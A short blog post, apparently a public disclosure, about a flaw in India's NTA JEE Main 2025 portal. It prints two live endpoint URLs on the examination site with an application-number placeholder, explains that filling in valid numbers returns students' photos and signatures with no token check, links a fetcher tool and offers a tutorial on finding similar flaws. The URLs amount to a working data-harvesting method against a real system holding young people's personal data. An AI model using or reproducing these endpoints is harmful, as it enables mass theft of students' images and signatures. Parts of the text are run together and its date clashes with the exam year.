Fri Jan 12 2024
2025 JEE Mains Students Data Leak
- 2025 JEE Mains Students Data Leak
Know how Intermediate Students outsmarted NTA engineers who always deliver weak protections towards data like many of Indian gov websites.
A Major Security Flaw Exposed in the NTA Portal: What You Need to Know
I've already created a detailed video on this issue, which you can watch here to get a complete understanding of the situation.
Demo Video
This post is necessarily to expose more details on how hack happend for you to explore which youtube often restricts with it's policies
The official Reddit post is deleted: link
Here is the reddit post explaining the issue: link
The Vulnerability ↩
Code:
Source code from JEE Main Info Fetcher: link
Explaination:
https://examinationservices.nic.in/JeeMain2025/Handler/DisplayCandImagePDF.ashx?appformid=101032511&appno=${appNumber}&docType=01
https://examinationservices.nic.in/JeeMain2025/Handler/DisplayCandImagePDF.ashx?appformid=101032511&appno=${appNumber}&docType=03Both these endpoints are not secured to have a valid token to fetch the photo and signature. So upon passing a valid application number in place of appNumber and visiting the url's will expose the student data.
If you want brief demo on how to identify these kind of Vulnerabilities... Comment under my youtube video I'll make a dedicated tutorial video.
Bye
- 2025 JEE Mains Students Data Leak